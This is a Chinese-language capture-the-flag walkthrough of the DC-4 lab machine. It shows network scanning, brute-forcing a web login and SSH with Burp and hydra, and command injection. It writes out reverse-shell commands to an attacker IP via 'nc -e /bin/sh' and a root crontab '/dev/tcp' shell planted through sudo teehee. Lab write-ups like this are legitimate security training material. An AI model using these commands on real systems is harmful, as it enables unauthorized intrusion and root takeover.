过程
1. 探测目标主机
nmap -sP 192.168.246.0/24,得到目标主机IP:192.168.246.141
2. 信息搜集
-
端口信息
-
web站点的相关服务信息
登录页面: -
目录信息
使用dirbuster:
login.php和logout.php也会跳转到index.php这个登录页面。
3. 后台**
使用Burp**:
抓包后发送到Intruder后,选择Clusterbomb模式,分别载入字典,这里字典使用kali里的http_default_users.txt和burnett_top_1024.txt:
开始**:
登录后发现可以执行自带的一些命令:
4. 获取shell
使用Burp抓包后查看能否修改信息:
修改radio参数信息为whoami:
可以任意执行命令,反弹shell:
先在kali中监听再放包nc -e /bin/sh 192.168.246.138 888
使用python得到交互式shell:python -c 'import pty;pty.spawn("/bin/bash")'
查看/etc/passwd文件:cat /etc/passwd
看到home下的三个用户,进入后在jim/backups里找到旧密码的备份文件:
复制保存在dc4.txt中,使用hydra**ssh:hydra -l jim -P /root/Desktop/dc4.txt ssh://192.168.246.141
5. 登录ssh
使用**出来的用户密码:jim:jibril04
提示有封邮件:
进入mail目录
su切换用户到charles,并查看用户权限:su charles
发现teehee是使用root权限免密执行。
6.利用teehee提权
参考文章sudo teehee /etc/crontab* * * * * root bash -c "bash -i >&/dev/tcp/192.168.246.138/8888 0>&1"
总结
- 好好学习,天天向上